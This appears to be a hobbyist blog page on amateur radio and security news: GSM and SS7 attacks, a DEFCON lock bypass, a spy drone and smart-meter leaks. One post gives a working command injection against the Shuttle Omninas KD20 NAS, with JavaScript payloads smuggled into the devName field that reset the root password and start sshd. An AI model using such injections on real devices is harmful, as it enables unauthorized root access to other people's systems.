amateur radio


My first taste of Amateur Radio was in the early 90s – I have a ‘replacement’ operators certificate dated 1991, and maybe even one of my original yellow licenses from the Department of Communications kicking around in a box somewhere.

It’s been a while since I’ve messed around with amateur radio. I use APRS on and off for various reasons, but voice nets weren’t really of interest, and data networking was always pretty interesting to me. In the 90s I played around with AX.25 and even went to Vancouver Area Packet Organization meetings but as AX.25/IP gradually died out I found other interesting use cases in the ISM bands to play with.

QRM and digital modes have been on my radar for a while. One of these days I’ll get more into HF work, but lately I’ve been eyeballing the need for a new HT – and location tracking is pretty much mandatory. I’m not interested in spending a lot on an HT either and as a result, I’m eagerly awaiting my BTECH DMR-6×2 to mess with.

The thing does APRS over analog, and SMS over DMR intrigues me. Actually, 9600 bps over 2×6.5 Khz channels intrigues me – but that’s a post for another day.

In the mean time.. notes to self:


[email protected] Now More Powerful Than World’s Top 7 Supercomputers, Combined

Propelled by average enthusiasts in their shared quest to defeat COVID-19, the [email protected] network is now pushing out 470 PetaFLOPS of raw compute power. To put that in perspective, that’s twice as fast as Summit, the world’s fastest supercomputer, making the network faster than any known supercomputer. It’s also faster than the top seven supercomputers in the world, combined.


Tobias Engel: SS7: Locate. Track. Manipulate.


Getting root (and SSHD on boot) with the Shuttle Omninas KD20

I recently picked up a Shuttle Omninas KD20 on sale from NCIX.    It runs Linux, but sshd is disabled by default.  Thankfully it wasn’t too difficult to break in to.


The Storage -> Disk Manager page has an info button that calls smartctl -a.  It doesn’t check parameters passed by the page 

With the Disk Manager page loaded, open your Web Developer Console and run the following javascript commands:

(pastebin text version; thanks to scotty86 for the paste)



url: ‘’,

cache: false,

//data: “devName=sda”+$devName,

data: “devName=/dev/sd; (echo \”foobar\nfoobar\n\” | sudo passwd root) “,





# Changing the root password



url: ‘’,

cache: false,

//data: “devName=sda”+$devName,

data: “devName=/dev/sd; sudo /etc/rc.d/ start”,





# start sshd

With those simple little ajaxy functions I was able to access the device via ssh

login as: root
[email protected]′s password:
BusyBox v1.10.3 (2013-11-06 11:05:30 CST) built-in shell (ash)
Enter ‘help’ for a list of built-in commands.

Filesystem 1k-blocks Used Available Use% Mounted on
/dev/ram0 15863 2134 13729 13% /initrd
/dev/md0 201556 372 190948 0% /system
/dev/md1 1463634048 27294636 1436339412 2% /share/atonnas
OMNINAS-XYZZY> cd /proc/
OMNINAS-XYZZY> cat cpuinfo
Processor : ARMv6-compatible processor rev 5 (v6l)
processor : 0
BogoMIPS : 299.00

processor : 1
BogoMIPS : 299.82

Features : swp half thumb fastmult edsp java
CPU implementer : 0×41
CPU architecture: 7
CPU variant : 0×0
CPU part : 0xb02
CPU revision : 5

Hardware : Oxsemi NAS
Revision : 0000
Serial : 0000000000000000


It would be nice if Shuttle just enabled ssh by default though.  Pretty please?


Smart meter SSL screw-up reveals a bit to much information

The researchers said German firm Discovergy apparently allowed information gathered by its smart meters to travel over an insecure link to its servers. The information – which could be intercepted – apparently could be interpreted to reveal not only whether or not users happened to be at home and consuming electricity at the time but even what film they were watching, based on the fingerprint of power usage.


What if They Declared an Emergency and No One Came?

The Attawapiskat First Nation is in such a desire state that it has declared a state of emergency – but no level of Government or aid agency has come to their aid.  The local grade school shut down 12 years ago thanks to toxic contamination – 13 year old’s have had to step up to draw attention all the way from the United Nations.  Yet right next door is the De Beers Vector mine – the richest Diamond Mine in the Western World


Low Cost/Low-Power/DIY Cellular data network


Shareable recently covered a group of residents of Jalalabad, Afghanistan who built their own open-source wireless network from junk and everyday household items. For the less-industrious yet DIY-inclined, the Village Base Station (pdf) is a low-power, easy to deploy tool developed by Berkeley professor Kurtis Heimerl to create a GSM cellular data network in areas with limited power and network resources. MobileActive recently got their hands on a prototype and tested it in a large American city, and the results were promising. In a post about the experiment, they note the benefits of the Village Base Station:

…?exible off-the grid deployment due to low power requirements that enable local generation via solar or wind; explicit support for local services within the village that can be autonomous relative to a national carrier; novel power/coverage trade-offs based on intermittency that can provide bursts of wider coverage; and a portfolio of data and voice services (not just GSM).


4G and CDMA, GPRS reportedly hacked

Extremetech reports that a MITM attack was conducted against all 4G and CDMA transmissions in and around the DEFCON venue in Las Vegas.  Apparently the MITM attack allowed attackers to obtain full access to some Android and PC devices, and was able to monitor data and telephony sessions.

The Register is also reporting that Security Research Labs has developed a way to monitor GPRS conversations by exploiting weaknesses in the protocol.  Demonstration software is expected to be released at CCC 2011. (In 2009 SRL’s Chief Scientist also coordinated release of a rainbow table to assist in cracking GSM, and in 2010 other cryptographers where able to defeat 3G encryption).

Fun times!


Defcon Lockpickers Open Card-And-Code Government Locks In Seconds

Lockpicker Toby Bluzmanis inserts a wire into the LED readout of Kaba’s E-Plex 5800 to open the lock.

To open a door fitted with the latest U.S. government-certified lock from high-end Swiss lock manufacturer Kaba, an employee must both enter a code up to eight digits long, then swipe a unique identity card coded to comply with a new standard that requires an extra layer of security, one designed to track individual staffers and make covert intrusion harder than ever.

Or, as lockpicking expert Marc Weber Tobias will show a crowd of hackers Friday, you can stick a wire in the tiny display light above the keypad and instantly render all of that “security” irrelevant.

At the Defcon security conference in Las Vegas, Tobias and his partner Toby Bluzmanis plan to demonstrate a series of simple hardware hacks that expose critical security problems in Kaba’s E-plex 5800 and its older 5000. Zurich-based Kaba markets the 5800 lock, which Bluzmmanis says can cost as much as $1,300, as the first to integrate code-based access controls with a new Department of Homeland Security standard that goes into effect next year and requires identifying credentials be used in secure facilities to control access.

In demonstrations for me and in videos they plan to show the Defcon audience, the lockpicking duo use one method called “rapping” to open the lock by simply hitting its top surface or lever handle with a mallet, compressing an internal spring that then decompresses and pushes open a latch that releases the lock. In another bypass, they insert a wire into a silicon cover for an LED light that blinks red when the user enters an invalid code. That wire can ground a contact on the circuit board behind the light that triggers a function intended to allow the door to be opened with a remote button, bypassing all its security measures.

A third attack allows an insider to open the back side of the lock and insert a wire that flips a microswitch intended as an override for power failures. That trick resets the lock’s software, tampering with its audit trail and allowing it to be reprogrammed with different codes. Bluzmanis demonstrated in a video that the more elaborate microswitch attack could be performed in under a minute.

“The issue is simply insecurity engineering,” says Tobias, who works as a consultant to several major lock firms and contributes blog posts to “They simply don’t get it.”


Flying Drone Can Crack Wi-Fi Networks, Snoop On Cell Phones

Mike Tassey posing with the Wireless Aerial Surveillance Platform, WASP.

How do one ex-Air Force official and one former airplane hobby shop owner, both of whom happen to have decades of experience as network security contractors for the military, spend their weekends? Building a flying, unmanned, automated password-cracking, Wi-Fi-sniffing, cell-phone eavesdropping spy drone, of course.

At the Black Hat and Defcon security conferences in Las Vegas next week, Mike Tassey and Richard Perkins plan to show the crowd of hackers a year’s worth of progress on their Wireless Aerial Surveillace Platform, or WASP, the second year Tassey and Perkins have displayed the 14-pound, six-foot long, six-foot wingspan unmanned aerial vehicle. The WASP, built from a retired Army target drone converted from a gasoline engine to electric batteries, is equipped with an HD camera, a cigarette-pack sized on-board Linux computer packed with network-hacking tools including the BackTrack testing toolset and a custom-built 340 million word dictionary for brute-force guessing of passwords, and eleven antennae.

“This is like Black Hat’s greatest hits,” Tassey says. “And it flies.”

On top of cracking wifi networks, the upgraded WASP now also performs a new trick: impersonating the GSM cell phone towers used by AT&T and T-Mobile to trick phones into connecting to the plane’s antenna rather than their carrier, allowing the drone to record conversations and text messages on a32 gigabytes of storage. A 4G T-mobile card routes the communications through voice-over-Internet or traditional phone connections to avoid dropping the call. “Ideally, the target won’t even know he’s being spied on,” says Tassey.

That GSM hack is based on a demonstration that security researcher Chris Paget performed at Defcon last year, showing that with a powerful enough antenna placed close enough to target phones, the victims’ handsets can be tricked into connecting to Paget’s setup instead of the carrier’s tower. Perkins and Tassey have implemented the same tools in their airborne hacking machine, and like Paget, used a portion of the radio frequency band set aside for Ham radios to avoid violating FCC regulations. They don’t plan to demonstrate the phone-hacking trick at the conference, and tested it only in isolated conditions to ensure their flying contraption wasn’t illegally eavesdropping on random strangers’ phones. “We want to make sure we’re not stepping on any cell providers’ toes,” says Tassey.

And why build a digital spy drone? Perkins, an Air Force contractor focused on cybersecurity who once owned a airplane hobby shop, and Tassey, an ex-Air Force consultant with Engineering Systems Solutions, say they wanted to demonstrate the vulnerability of government and corporate facilities to a nimble eavesdropping machine that can cover large distances and circle above a target. Though it requires remote control to take off and land, WASP can be set to fly a pre-programmed course once airborne and loiter around any chosen area. “We wanted to bring to light how far the consumer industry has progressed, to the point where public has access to technologies that put companies, and even governments at risk from this new threat vector that they’re not aware of,” says Perkins.

A military base like Area 51, Tassey points out, is surrounded by more than 25 miles of empty land to obscure it from outside snoops. “With WASP, we can cover that distance in about 20 minutes,” he says. “With radar designed specifically not to see birds, it’s very difficult to protect yourself from an object coming out of the sky and flying low.”

WASP’s design, complete with two eyes and a black-and-yellow striped paint job, isn’t not exactly designed for stealth. But aside from showing real-world security risks, Tassey and Perkins also shared a goal just as appealing to Black Hat and Defcon’s crowd: pulling off a fantastically elaborate hack. “The number one reason we did this was because we were told it wouldn’t be possible,” says Perkins. “Neither of us like hearing that.”